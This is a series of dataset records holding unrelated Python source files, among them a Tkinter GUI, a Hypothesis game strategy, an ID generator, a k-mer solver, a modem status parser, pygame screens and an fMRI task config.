TreeLineNum\n global DegTreeview\n global DegComBox\n global DegClkRowId\n global DegClkColumnId\n global OpTreeview\n global OpComBox\n global OpClkRowId\n global OpClkColumnId\n \n if(TreeLineNum == 666):\n \treturn\n \n if(str(event) == '0'):\n win.update()\n TreeHigh = ParTreeview.winfo_height()\n else:\n TreeHigh = event.height\n if DegComBox:\n x,y,width,height = DegTreeview.bbox(DegClkRowId,DegClkColumnId)\n pady = height // 2\n DegComBox.place( x=x, y=y+pady, width=width, anchor=W)\n if OpComBox:\n x,y,width,height = OpTreeview.bbox(OpClkRowId, OpClkColumnId)\n pady = height // 2\n OpComBox.place( x=x, y=y+pady, width=width, anchor=W)\n \n Remainder = TreeHigh % 20\n TreeviewPst = (TreeHigh-27.0) / (TreeLineNum * 20.0 + Remainder)\n BarStart = bar.get()[0]\n bar.set(BarStart,str(BarStart + TreeviewPst)) \n\n# Treeview使用鼠标滚轮滚动后,自动调整另外两个Treeview的位置,并同步修改滚动条的位置\ndef TreeviewScroll(*Date):\n global TreeviewPst\n global TreeLineNum\n if(TreeLineNum == 666):\n \treturn\n \n if DegComBox:\n DegComBox.destroy() \n if OpComBox:\n OpComBox.destroy()\n\n ParTreeview.yview('moveto',float(Date[0]))\n DegTreeview.yview('moveto',float(Date[0]))\n OpTreeview.yview('moveto',float(Date[0]))\n bar.set(Date[0],str(float(Date[0]) + TreeviewPst)) \n\n\n#建立窗口\nwin = Tk()\nwin.title('Flying Driver')\nwin.geometry('450x550')\n#win.iconbitmap('bitbug_favicon.ico')\n#win.resizable(0,0) #阻止Python GUI的大小调擿\n\nTopFrame = ttk.Frame(win)\nTopFrame.pack(fill=X,padx=5,pady=5,expand=FALSE,side=TOP)\n\n#创建单行文本框,输入地址使用\ndir = StringVar()\ndirEntry = ttk.Entry(TopFrame, textvariable=dir, width=20)\ndirEntry.pack(fill=X,padx=0,pady=0,expand=TRUE,side=LEFT)\n#dirEntered.insert(INSERT,\"输入路径...\")\n\n# 创建按钮,用于输入地址使用\nViewButton = ttk.Button(TopFrame)\nViewButton.config(text='View',command=SelectFile,width =4)\nViewButton.pack(expand=FALSE,side=LEFT,padx=0,pady=0)\n\n# 空白标签,占位分开view和echange按钮\nSpaceLabel = ttk.Label(TopFrame)\nSpaceLabel.config(width = 0)\nSpaceLabel.pack(expand=FALSE,padx=5,pady=0,side=LEFT)\n\n# 创建按钮,用于进行转换操作\nChgButton = ttk.Button(TopFrame)\nChgButton.config(text='Exchange',command=ChangeFile,width=8)\nChgButton.pack(expand=FALSE,side=RIGHT,padx=0,pady=0)\n\n# 
创建框架,用于摆放三个Treeview控件\nBotFrame = ttk.Frame(win)\nBotFrame.pack(fill=BOTH,padx=5,pady=5,expand=TRUE,side=TOP)\n\nParTreeview = ttk.Treeview(BotFrame)\nParTreeview.config(columns=('Parameter'),show='headings',yscrollcommand=TreeviewScroll)\nParTreeview.column('Parameter', width=150, anchor='w')\nParTreeview.heading('Parameter', text='Parameter')\nParTreeview.pack(expand=TRUE,fill=BOTH,padx=0,pady=0,side=LEFT)\n\nDegTreeview = ttk.Treeview(BotFrame)\nDegTreeview.config(columns=('Degree'),show='headings',yscrollcommand=TreeviewScroll)\nDegTreeview.column('Degree', width=5, anchor='w')\nDegTreeview.heading('Degree', text='Precision')\nDegTreeview.pack(expand=TRUE,fill=BOTH,padx=0,pady=0,side=LEFT)\n\nOpTreeview = ttk.Treeview(BotFrame)\nOpTreeview.config(columns=('Operation'),show='headings',yscrollcommand=TreeviewScroll)\nOpTreeview.column('Operation', width=5, anchor='w')\nOpTreeview.heading('Operation', text='Operation')\nOpTreeview.pack(expand=TRUE,fill=BOTH,padx=0,pady=0,side=LEFT)\n\n# 创建滑块,用于控制三个Treeview的滚动\nbar=ttk.Scrollbar(BotFrame)\nbar.config(command=BarMove)#ParTreeview.yview)\nbar.pack(fill=Y,side=RIGHT,expand=FALSE,padx=0,pady=0)\n\n# 底部标签,显示当前的操作状态\nInfoLabel = ttk.Label(win)\nInfoLabel.config(text=('Drivering...'))\nInfoLabel.pack(fill=X,expand=FALSE,padx=5,pady=0,side=BOTTOM)\n\n# 初始化Treeview对应的三个List的值\nfor i in range(100):\n ParList.append('Par')\n DegList.append('保持')\n OpList.append('无操作')\n\n# 窗口大小改变,需要改变滑块的大小\nBotFrame.bind(\"\",BarSizeAutoSet)\n#DegTreeview.bind(\"\", DegDBClick)\n#OpTreeview.bind(\"\", OpDBClick)\n\n# 绑定三个Treeview的点击操作,包括下拉框选择和当前选中条目的设置\nParTreeview.bind(\"\",ParClick )\nDegTreeview.bind(\"\", DegClick)\nDegTreeview.bind(\"\", DegDbClear)\nDegTreeview.bind(\"\", TreeButtonRelease)\nOpTreeview.bind(\"\",OpClick )\nOpTreeview.bind(\"\", OpDbClear)\nOpTreeview.bind(\"\",TreeButtonRelease )\n\nwin.mainloop()\n\n","sub_path":"FlyDrivers_FirstDragt(1).py","file_name":"FlyDrivers_FirstDragt(1).py","file_ext":"py","file_size_in_byte":20572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"238669085","text":"\"\"\"\nA hypothesis strategy for sampling Games.\n\nWe use hypothesis.strategies.recursive to build pairs of options recursively, with some base\nset of Games as leaves. By manual testing, using the second day games as leaves, and limiting left\nand right options to having at most two games tends to sample things best. Having too many options\nincreases the likelihood of a number which would dominate any interesting infinitesimals. As such,\nit would be pretty rare to sample tinies or the like.\n\"\"\"\n\nfrom hypothesis.strategies import composite, lists, recursive, sampled_from, tuples\n\nfrom .game import Game\nfrom .lattice import all_games_gen\nfrom .tools import canonicalize\n\n\n__all__ = [\n 'games',\n]\n\n\ndef gamify(options):\n \"\"\"\n Transform a nested pair of options into a Game in canonical form.\n\n Parameters\n ----------\n options : tuple(list, list)\n Nested tuples containing two lists of tuples containing two lists... 
with Games as leaves.\n\n Returns\n -------\n g : Game\n The Game represented by `options`.\n \"\"\"\n try:\n left, right = options\n left = [gamify(_) for _ in left]\n right = [gamify(_) for _ in right]\n return canonicalize(Game(left, right))\n except TypeError:\n return options\n\n\n@composite\ndef games(draw, base_day=2, max_options=2): # pragma: no cover\n \"\"\"\n A Hypothesis strategy for generating Games.\n\n Parameters\n ----------\n draw : func\n Required by hypothesis.strategies.composite.\n base_day : int >= 0\n The maximum birthday of games to use a leaves. Defaults to 2.\n max_options : int >= 0\n The maximum number of left, right options to allow for each subposition. Defaults to 2.\n Note that setting this number larger likely leads to the set being dominated by a number,\n reducing the variability in sampled games.\n\n Returns\n -------\n sample : Game\n A random Game.\n \"\"\"\n options = draw(recursive(base=sampled_from(list(all_games_gen(base_day))),\n extend=lambda child: tuples(lists(child, max_size=max_options),\n lists(child, max_size=max_options))))\n\n return gamify(options)\n","sub_path":"ludology/hypothesis.py","file_name":"hypothesis.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"212048381","text":"\"\"\"\n协议序列号:\n 格式: 0 - 46位时间戳 - 17位序列号\n\n直接调用 nextId()\n\"\"\"\nimport time\n\n\ndef getNewStamp():\n current_seconds = time.time()\n return int(current_seconds * 1000)\n\n\n# value 秒级时间戳\ndef timestamp_datetime(value):\n _format = '%Y-%m-%d %H:%M:%S'\n value = time.localtime(value)\n dt = time.strftime(_format, value)\n return dt\n\n\nclass GetSeqNo(object):\n sequence = 0\n lastStamp = 0\n\n # 2018-01-01 08:00:00,000\n START_STAMP = 1514764800000\n SEQUENCE_BIT = 17\n MAX_SEQUENCE = -1 ^ (-1 << SEQUENCE_BIT)\n TIMESTAMP_LEFT = SEQUENCE_BIT\n\n def __init__(self):\n self.sequence = 0\n self.lastStamp = 0\n\n def nextId(self):\n curr_stamp = getNewStamp()\n if curr_stamp == self.lastStamp:\n self.sequence = (self.sequence + 1) & self.MAX_SEQUENCE\n if self.sequence == 0:\n curr_stamp = self.getNextMill()\n else:\n self.sequence = 0\n\n self.lastStamp = curr_stamp\n return (curr_stamp - self.START_STAMP) << self.TIMESTAMP_LEFT | self.sequence\n\n def getNextMill(self):\n mill = getNewStamp()\n while mill <= self.lastStamp:\n mill = getNewStamp()\n return mill\n\n def getTimeMills(self, _id):\n self.isRangeID(_id)\n return (_id >> self.TIMESTAMP_LEFT) + self.START_STAMP\n\n def getSequence(self, _id):\n self.isRangeID(_id)\n return _id & self.MAX_SEQUENCE\n\n @staticmethod\n def isRangeID(_id):\n if _id < 0:\n raise RuntimeError(\"id range error.\")\n\n\nif __name__ == \"__main__\":\n seq = GetSeqNo()\n msg_id = seq.nextId()\n print(msg_id)\n print(timestamp_datetime(seq.getTimeMills(msg_id) / 1000))\n print(seq.getSequence(msg_id))\n","sub_path":"接口/B2B/b2b/testdata/simulate_upload/pb/get_seq_no.py","file_name":"get_seq_no.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"478525007","text":"print(\"=-=\"*9)\nprint(' SEQUENCIA DE FIBONATTI')\nprint(\"=-=\"*9)\n\nn1 = 0\nn2 = 1\ncount = 0\nresult = 0\ntermo = int(input(\"Informe um número: \"))\n\nif termo <= 0:\n print(f\"Número {termo} é inválido\")\n\nwhile count < termo:\n fib = n1 + n2\n\n n1 = n2\n n2 = fib\n count += 1\n\n if termo == fib:\n print('Açao bem sucedida!')\n result = fib\n\nif result != termo:\n 
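Per its docstring (sign bit 0, a 46-bit millisecond timestamp, a 17-bit sequence), the IDs minted by the get_seq_no.py record above can be unpacked by hand; a quick round-trip check, assuming that module's GetSeqNo class is importable:

seq = GetSeqNo()
msg_id = seq.nextId()

millis = (msg_id >> 17) + GetSeqNo.START_STAMP  # high bits: ms offset from the 2018-01-01 epoch
counter = msg_id & ((1 << 17) - 1)              # low 17 bits: per-millisecond counter
assert millis == seq.getTimeMills(msg_id)
assert counter == seq.getSequence(msg_id)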
print('Acão falhou...')\n\n\n\n\n","sub_path":"FIAP/Fase2_cap3/RM86567_Ex03.py","file_name":"RM86567_Ex03.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"162125589","text":"ELEMENTS = [\"A\", \"C\", \"G\", \"T\"]\n\n\ndef hamming_distance(word_1, word_2):\n count = 0\n for letter_1, letter_2 in zip(word_1, word_2):\n if letter_1 != letter_2:\n count += 1\n return count\n\n\ndef get_neighbors(pattern, d):\n neighbors = []\n\n if d == 0:\n return pattern\n\n if len(pattern) == 1:\n return ELEMENTS\n\n suffix = get_neighbors(pattern[1:], d)\n for text in suffix:\n if hamming_distance(pattern[1:], text) < d:\n for element in ELEMENTS:\n neighbors.append(element + text)\n else:\n neighbors.append(pattern[0] + text)\n return neighbors\n\n\ndef get_words(genome, k):\n words = []\n for start in range(len(genome) - k + 1):\n end = start + k\n words.append(genome[start:end])\n return words\n\n\ndef get_neighborhood(words, d):\n neighborhood = set()\n for word in words:\n neighborhood.update(set(get_neighbors(word, d)))\n return neighborhood\n\n\ndef find_frequent(genome, k, d):\n result = []\n max = 0\n\n words = get_words(genome, k)\n neighborhood = get_neighborhood(words, d)\n\n for neighbor in neighborhood:\n frequent = 0\n for word in words:\n if hamming_distance(neighbor, word) <= d:\n frequent += 1\n\n if max < frequent:\n max = frequent\n result = [neighbor]\n elif max == frequent:\n result.append(neighbor)\n return result\n\n\nclass Executor:\n @staticmethod\n def _read_input_file(filename):\n with open(filename) as f:\n data = f.read()\n\n input_list = data.split()\n\n input_data = []\n for element in input_list:\n if 'input' in element.lower():\n continue\n elif 'output' in element.lower():\n break\n else:\n input_data.append(element)\n\n return input_data\n\n @staticmethod\n def execute(func, filename):\n input_data = Executor._read_input_file(filename)\n\n converted_input_data = []\n for element in input_data:\n if element.isdigit():\n converted_input_data.append(int(element))\n else:\n converted_input_data.append(element)\n\n result = func(*converted_input_data)\n print(*result)\n\n\nif __name__ == '__main__':\n Executor.execute(find_frequent, 'frequent_words_mismatch.txt')\n","sub_path":"04/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"464950781","text":"import procgame.game\nimport pygame\nimport my_modes\nfrom pygame.locals import *\nfrom pygame.font import *\nfrom my_modes import PlanetMode\n\nclass MercuryMode(PlanetMode):\n \"\"\"\n This is the skillshot- it lights the sequence of lights and\n registers hits on the targets on the left hand side.\n \"\"\"\n def __init__(self, game):\n super(PlanetMode, self).__init__(game=game, priority=40)\n self.iPlanetTickCounter = 75\n self.iSpecialTickCounter = 60\n self.bSpecialCountdown = False\n self.strPlanetVoice = 'mercury_closest'\n self.strPlanetName = 'Mercury'\n self.strPlanetDisplayText = ['Mercury', '', 'Video Mode']\n pass\n\n def checkHit(self, num):\n if(num == -1):\n self.game.sound.play('laser')\n self.game.score(100)\n else:\n self.SuccessHelper()\n","sub_path":"my_modes/MercuryMode.py","file_name":"MercuryMode.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"198527569","text":"# __init__.py\n# Cisco 
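A tiny worked example for the frequent-words-with-mismatches record above, assuming its functions are in scope: the d=1 neighborhood of a 2-mer is the pattern itself plus every single-letter substitution.

print(sorted(get_neighbors("AC", 1)))
# ['AA', 'AC', 'AG', 'AT', 'CC', 'GC', 'TC']

# find_frequent then counts, for every neighborhood k-mer, how many window
# k-mers of the genome sit within Hamming distance d, keeping the maximisers:
print(find_frequent("ACGTTGCATGTCGCATGATGCATGAGAGCT", 4, 1))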
DPC3216 Status Page Parser\n\nimport urllib.request\n\nDEFAULT_IP = \"192.168.100.1\"\nDEFAULT_PAGE = \"Docsis_system.asp\"\nDEFAULT_LANG = \"lang.js\"\n\nclass dpc3216:\n def __init__(self, pageData=\"\", langData=\"\"):\n self.pageData = pageData\n self.langData = langData\n self.STATIC = len(pageData) > 0\n self.lang = {}\n self.modemInfo = {}\n self.docsisInfo = {}\n self.rx = {}\n self.tx = {}\n self.lang[\"venabled\"] = \"Enabled\"\n #print(\"Cisco DPC3216 Parsing Library Initialized\")\n\n\n def getPageData(self):\n self.pageData = \"\"\n try:\n response = urllib.request.urlopen(\"http://{}/{}\".format(DEFAULT_IP, DEFAULT_PAGE))\n self.pageData = response.read().decode(\"utf-8\")\n if response.status != 200:\n print(\"There was a problem with fetching {}\".format(DEFAULT_PAGE))\n except Exception as e:\n print(\"Error fetching file: {}\".format(e))\n\n\n def getLangData(self):\n self.langData = \"\"\n try:\n response = urllib.request.urlopen(\"http://{}/{}\".format(DEFAULT_IP, DEFAULT_LANG))\n self.langData = response.read().decode(\"utf-8\")\n if response.status != 200:\n print(\"There was a problem with fetching {}\".format(DEFAULT_LANG))\n except Exception as e:\n print(\"Error fetching file: {}\".format(e))\n\n\n def parseLang(self):\n for line in self.langData.split(\"\\n\"):\n try:\n if line[0:3] == \"var\":\n #print(line[4:-1])\n name, rval = line[4:].split(\";\",1)[0].split(\"=\",1)\n if \"\\\"\" in rval:\n val = rval.replace(\"\\\"\",\"\").strip()\n self.lang[name] = val\n else:\n val = rval.strip()\n self.lang[name] = val\n #print(\"#Val: {} #Name: {}\".format(val, name))\n except Exception as e:\n print(\"Error with line: {}\\nLine: {}\".format(e, line))\n #print(self.lang)\n\n\n def scriptToName(self, var):\n start = var.find(\"dw(\") + 3\n end = var.find(\");\")\n #print(\"start: {} end: {}\".format(start, end))\n if start != -1 and end != -1:\n name = var[start:end]\n try:\n return self.lang[name]\n except:\n return name[1:] + \" << NAME RESOLVER FAIL\"\n\n\n def parseTable(self, tableName, tableData):\n tableLines = tableData.split(\"\\n\")\n if tableName == \"Modem Information\" or tableName == \"Docsis Information\":\n name = \"\"\n for x in range(0, len(tableLines)):\n\n if \"td id=\" in tableLines[x]:\n #print(tableLines[x].strip())\n #print(tableLines[x+1].strip())\n if \"script\" in tableLines[x+1]:\n #print(self.scriptToName(tableLines[x+1]))\n name = self.scriptToName(tableLines[x+1]).replace(\":\",\"\")\n else:\n pass\n #print(tableLines[x+1].strip())\n\n if \"td headers=\" in tableLines[x]:\n #print(tableLines[x].strip())\n #print(tableLines[x+1].strip())\n val = \"\"\n if \"script\" in tableLines[x+1]:\n #print(self.scriptToName(tableLines[x+1]))\n val = self.scriptToName(tableLines[x+1])\n else:\n #print(tableLines[x+1].strip())\n val = tableLines[x+1].strip()\n\n if tableName == \"Modem Information\":\n self.modemInfo[name] = val\n if tableName == \"Docsis Information\":\n self.docsisInfo[name] = val\n #print (\"x: {} line: {}\".format(x, tableLines[x]))\n elif tableName == \"Downstream Channel Information\" or tableName == \"Upstream Channel Information\":\n channel = -1\n name = \"\"\n pwr = \"\"\n snr = \"\"\n for x in range(0, len(tableLines)):\n #print()\n if \"td id=\\\"channel_\" in tableLines[x] or \"td id=\\\"up_channel_\" in tableLines[x]:\n #print(tableLines[x].strip())\n channelLoc = tableLines[x].find(\"channel_\") + len(\"channel_\")\n channel = int(tableLines[x][channelLoc:channelLoc+2].strip().replace(\"\\\"\",\"\"))\n #print(\"Channel: 
{}\".format(channel))\n name = \"Channel {}\".format(channel)\n\n if \"td headers=\\\"channel_\" in tableLines[x] or \"td headers=\\\"up_channel_\" in tableLines[x]:\n #print(tableLines[x].strip())\n val = \"\"\n\n start = tableLines[x].find(\"nowrap>\") + len(\"nowrap>\")\n end = tableLines[x].find(\" mapNum1Pos[0] and x < mapNum1Pos[0] + mapNum1Button.get_width() \\\n and y > mapNum1Pos[1] and y < mapNum1Pos[1] + mapNum1Button.get_height():\n\n # 地图选中特效\n mapNum1Button = pygame.image.load(path(\"res/mapnum/Mapnum1_1.png\")).convert_alpha()\n mapNum2Button = pygame.image.load(path(\"res/mapnum/Mapnum2_0.png\")).convert_alpha()\n mapNum3Button = pygame.image.load(path(\"res/mapnum/Mapnum3_0.png\")).convert_alpha()\n mapNum4Button = pygame.image.load(path(\"res/mapnum/Mapnum4_0.png\")).convert_alpha()\n mapNum5Button = pygame.image.load(path(\"res/mapnum/Mapnum5_0.png\")).convert_alpha()\n mapNum6Button = pygame.image.load(path(\"res/mapnum/Mapnum6_0.png\")).convert_alpha()\n # 地图信息\n mapinfoID = path(\"res/mapinfo/Map\" + str(modeID) + \"_1info.png\")\n mapinfo = pygame.image.load(mapinfoID).convert_alpha()\n mapInfoPos = (0,150)\n flagMapInfo = 1\n # shift picture\n\n if x > mapNum2Pos[0] and x < mapNum2Pos[0] + mapNum2Button.get_width() \\\n and y > mapNum2Pos[1] and y < mapNum2Pos[1] + mapNum2Button.get_height():\n mapNum1Button = pygame.image.load(path(\"res/mapnum/Mapnum1_0.png\")).convert_alpha()\n mapNum2Button = pygame.image.load(path(\"res/mapnum/Mapnum2_1.png\")).convert_alpha()\n mapNum3Button = pygame.image.load(path(\"res/mapnum/Mapnum3_0.png\")).convert_alpha()\n mapNum4Button = pygame.image.load(path(\"res/mapnum/Mapnum4_0.png\")).convert_alpha()\n mapNum5Button = pygame.image.load(path(\"res/mapnum/Mapnum5_0.png\")).convert_alpha()\n mapNum6Button = pygame.image.load(path(\"res/mapnum/Mapnum6_0.png\")).convert_alpha()\n mapinfoID = path(\"res/mapinfo/Map\" + str(modeID) + \"_2info.png\")\n mapinfo = pygame.image.load(mapinfoID).convert_alpha()\n flagMapInfo = 2\n # shift picture\n\n if x > mapNum3Pos[0] and x < mapNum3Pos[0] + mapNum3Button.get_width() \\\n and y > mapNum3Pos[1] and y < mapNum3Pos[1] + mapNum3Button.get_height():\n mapNum1Button = pygame.image.load(path(\"res/mapnum/Mapnum1_0.png\")).convert_alpha()\n mapNum2Button = pygame.image.load(path(\"res/mapnum/Mapnum2_0.png\")).convert_alpha()\n mapNum3Button = pygame.image.load(path(\"res/mapnum/Mapnum3_1.png\")).convert_alpha()\n mapNum4Button = pygame.image.load(path(\"res/mapnum/Mapnum4_0.png\")).convert_alpha()\n mapNum5Button = pygame.image.load(path(\"res/mapnum/Mapnum5_0.png\")).convert_alpha()\n mapNum6Button = pygame.image.load(path(\"res/mapnum/Mapnum6_0.png\")).convert_alpha()\n mapinfoID = path(\"res/mapinfo/Map\" + str(modeID) + \"_3info.png\")\n mapinfo = pygame.image.load(mapinfoID).convert_alpha()\n flagMapInfo = 3\n # shift picture\n\n if x > mapNum4Pos[0] and x < mapNum4Pos[0] + mapNum4Button.get_width() \\\n and y > mapNum4Pos[1] and y < mapNum4Pos[1] + mapNum4Button.get_height():\n mapNum1Button = pygame.image.load(path(\"res/mapnum/Mapnum1_0.png\")).convert_alpha()\n mapNum2Button = pygame.image.load(path(\"res/mapnum/Mapnum2_0.png\")).convert_alpha()\n mapNum3Button = pygame.image.load(path(\"res/mapnum/Mapnum3_0.png\")).convert_alpha()\n mapNum4Button = pygame.image.load(path(\"res/mapnum/Mapnum4_1.png\")).convert_alpha()\n mapNum5Button = pygame.image.load(path(\"res/mapnum/Mapnum5_0.png\")).convert_alpha()\n mapNum6Button = 
pygame.image.load(path(\"res/mapnum/Mapnum6_0.png\")).convert_alpha()\n mapinfoID = path(\"res/mapinfo/Map\" + str(modeID) + \"_4info.png\")\n mapinfo = pygame.image.load(mapinfoID).convert_alpha()\n flagMapInfo = 4\n # shift picture\n\n if x > mapNum5Pos[0] and x < mapNum5Pos[0] + mapNum5Button.get_width() \\\n and y > mapNum5Pos[1] and y < mapNum5Pos[1] + mapNum5Button.get_height():\n mapNum1Button = pygame.image.load(path(\"res/mapnum/Mapnum1_0.png\")).convert_alpha()\n mapNum2Button = pygame.image.load(path(\"res/mapnum/Mapnum2_0.png\")).convert_alpha()\n mapNum3Button = pygame.image.load(path(\"res/mapnum/Mapnum3_0.png\")).convert_alpha()\n mapNum4Button = pygame.image.load(path(\"res/mapnum/Mapnum4_0.png\")).convert_alpha()\n mapNum5Button = pygame.image.load(path(\"res/mapnum/Mapnum5_1.png\")).convert_alpha()\n mapNum6Button = pygame.image.load(path(\"res/mapnum/Mapnum6_0.png\")).convert_alpha()\n mapinfoID = path(\"res/mapinfo/Map\" + str(modeID) + \"_5info.png\")\n mapinfo = pygame.image.load(mapinfoID).convert_alpha()\n flagMapInfo = 5\n # shift picture\n\n if x > mapNum6Pos[0] and x < mapNum6Pos[0] + mapNum6Button.get_width() \\\n and y > mapNum6Pos[1] and y < mapNum6Pos[1] + mapNum6Button.get_height():\n mapNum1Button = pygame.image.load(path(\"res/mapnum/Mapnum1_0.png\")).convert_alpha()\n mapNum2Button = pygame.image.load(path(\"res/mapnum/Mapnum2_0.png\")).convert_alpha()\n mapNum3Button = pygame.image.load(path(\"res/mapnum/Mapnum3_0.png\")).convert_alpha()\n mapNum4Button = pygame.image.load(path(\"res/mapnum/Mapnum4_0.png\")).convert_alpha()\n mapNum5Button = pygame.image.load(path(\"res/mapnum/Mapnum5_0.png\")).convert_alpha()\n mapNum6Button = pygame.image.load(path(\"res/mapnum/Mapnum6_1.png\")).convert_alpha()\n mapinfoID = path(\"res/mapinfo/Map\" + str(modeID) + \"_6info.png\")\n mapinfo = pygame.image.load(mapinfoID).convert_alpha()\n flagMapInfo = 6\n # shift picture\n\n if x > surePos[0] and x < surePos[0] + sureButton.get_width() \\\n and y > surePos[1] and y < surePos[1] + sureButton.get_height() \\\n and flagMapInfo > 0:\n selectCharacters(screen, clock, modeID, flagMapInfo)\n breakflag = 1\n # load game\n\n if x > backPos[0] and x < backPos[0] + backButton.get_width() \\\n and y > backPos[1] and y < backPos[1] + backButton.get_height():\n from selectMode import selectMode\n selectMode(screen, clock)\n breakflag = 1\n # here to come back\n\n elif x > homePos[0] and x < homePos[0] + homeButton.get_width() \\\n and y > homePos[1] and y < homePos[1] + homeButton.get_height():\n from initialMenu import initialMenu\n initialMenu(screen, clock)\n breakflag = 1\n # here to come back home\n\n # 填充背景和内容\n screen.blit(background, (0, 0))\n screen.blit(backButton, backPos)\n screen.blit(homeButton, homePos)\n screen.blit(mapTitle, mapTitlePos)\n screen.blit(modeIntro, modeIntroPos)\n screen.blit(mapNum1Button,mapNum1Pos)\n screen.blit(mapNum2Button, mapNum2Pos)\n screen.blit(mapNum3Button, mapNum3Pos)\n screen.blit(mapNum4Button, mapNum4Pos)\n screen.blit(mapNum5Button, mapNum5Pos)\n screen.blit(mapNum6Button, mapNum6Pos)\n if flagMapInfo > 0:\n screen.blit(mapinfo, mapInfoPos)\n screen.blit(sureButton, surePos)\n # 说明文字\n # screen.blit(font.render(\"用上下左右键来控制\", True, (166, 100, 30)), (300, 50))\n # 更新画面\n pygame.display.update()\n # 帧率\n clock.tick(40)\n if breakflag == 1:\n 
break\n\n\n","sub_path":"src/selectMap.py","file_name":"selectMap.py","file_ext":"py","file_size_in_byte":10357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"507784223","text":"\"\"\"This file contains stimulus and task setting for probabilistic reversal\r\nlearning task. Options are organized into sections corresponding to certain\r\ntask objects or mechanisms.\r\n\r\nVersion for fMRI scanning, do not change!\r\n\"\"\"\r\n# Convert RGB color representation into PsychoPy default one\r\nrgb2psy = lambda x : [val / 127.5 - 1 for val in x]\r\n\r\n### Task construction ##########################################################\r\nN_trials = 110\r\nN_reversal = 4\r\nN_min_stable = 15\r\nreward_total = 50\r\nreward_minimum = 5\r\nreward_probability = 0.8\r\n\r\n# Account bar settings\r\naccount_max_rew = 2300\r\naccount_max_pun = 1200\r\ntick1_rew = 1150\r\ntick2_rew = 2300\r\ntick1_pun = 600\r\ntick2_pun = 0\r\n\r\n# Task timing (in seconds)\r\ntime_decision = 1.5 # Time to make decision\r\ntime_outcome = 1.5 # Time to see outcome\r\ntime_range_isi = (3, 7) # Interval between decision and outcome\r\ntime_range_iti = (3, 7) # Interval between trials\r\ntime_info_after = 10 # Time to see experiment summary (collected money)\r\nrefresh_rate = 60\r\n''' Total experiment time is:\r\n\r\n-> mean trial time: mtt = 1.5 (dec) + 1.5 (out) + 5 (isi) + 5 (iti) = 13 seconds\r\n-> dummy scan time: dst = 5 (N_dummy) * 2 (TR) = 10 seconds\r\n-> time info after: iat = (time_info_after) = 10 seconds\r\n\r\n-> total time: tt = 110 (N_trials) * mtt + dst + iat = 1430 + 10 + 10 =\r\n = 1450 seconds = 24 minutes 10 seconds\r\n\r\n-> extra time: 20 seconds\r\n-> sequence duration = tt + extra_time = 24 minutes 30 seconds\r\n'''\r\n\r\n# Available keys\r\nkey_quit = 'q'\r\nkey_left = 'a' # Left button SyncBox emulation\r\nkey_right = 'd' # Right button SyncBox emulation\r\nkey_pulse = 's' # Scanner pulse SyncBox emulation\r\n\r\n### Visual properties ##########################################################\r\n# Window (screen)\r\nwin_size = (800, 600)\r\nwin_monitor = 'testMonitor'\r\nwin_screen = 1 # For second screen, select 1.\r\nwin_fullscr = True\r\nwin_mouse_visible = False\r\nwin_color = [-1, -1, -1]\r\nwin_units = 'norm'\r\n\r\n# Boxes to choose\r\nbox_units = 'cm'\r\nbox_width = 5\r\nbox_height = 5\r\nbox_separation = 15\r\nbox_color1 = rgb2psy([86, 180, 233])\r\nbox_color2 = rgb2psy([240, 228, 66])\r\n\r\n# Account bar\r\nbar_height = 1\r\nbar_width = 20\r\nbar_y = -4\r\nbar_color = [-.8, -.8, -.8]\r\nbar_tick_width = .15\r\nbar_tick1_color = [1, 1, 1]\r\nbar_tick2_color = [1, 1, 1]\r\nbar_fill_color = [-.4, -.4, -.4]\r\n\r\n# Fixation circle\r\ncircle_units = 'cm'\r\ncircle_radius = 2\r\ncircle_edges = 50\r\ncircle_color = [-.4, -.4, -.4]\r\ncircle_line_width = 10\r\n\r\n# Digits and informations\r\ntext_units = 'cm'\r\ntext_digit_height = 1.5\r\ntext_letter_height = 1.5\r\ntext_digit_color = [-1, -1, -1]\r\ntext_letter_color = [1, 1, 1]\r\ntext_info_height = 1\r\ntext_up_y = 5\r\n","sub_path":"prl_task/prl_DecideNet_config_fmri.py","file_name":"prl_DecideNet_config_fmri.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"400478476","text":"from datetime import datetime\nfrom typing import Optional\n\nfrom cowin_api.constants import Constants, Vaccine, Dose, Fees\n\n\ndef today() -> str:\n return datetime.now().strftime(Constants.DD_MM_YYYY)\n\n\ndef 
filter_centers(centers: dict, min_age_limit: Optional[int] = None, vaccine: Optional[Vaccine] = None,\n dose: Optional[Dose] = None, fees: Optional[Fees] = None):\n original_centers = centers.get('centers')\n filtered_centers = {'centers': []}\n\n for index, center in enumerate(original_centers):\n if fees and not center.get('fee_type') == fees.value:\n continue\n\n filtered_sessions = []\n for session in center.get('sessions'):\n\n if min_age_limit and not session.get('min_age_limit') == min_age_limit:\n continue\n if vaccine and not session.get('vaccine') == vaccine.value:\n continue\n if dose and not session.get(dose.value) > 0:\n continue\n\n filtered_sessions.append(session)\n\n if filtered_sessions:\n center['sessions'] = filtered_sessions\n filtered_centers['centers'].append(center)\n\n return filtered_centers\n","sub_path":"cowin_api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"6716647","text":"#Name: human_player.py\n#Purpose: file containing HumanPlayer class, which handles interaction with the user\n\nimport pygame\n\n\n\nclass HumanPlayer:\n\n\n #constructor\n #parameters are: size of tile in x direction, size of tile in y direction, clock used by the game, frames per second\n def __init__(self, tileXSize, tileYSize, clock, fps = 60):\n self.clock = clock\n self.fps = fps\n self.tileXSize = tileXSize\n self.tileYSize = tileYSize\n\n\n\n #function responsible for sampling move from the 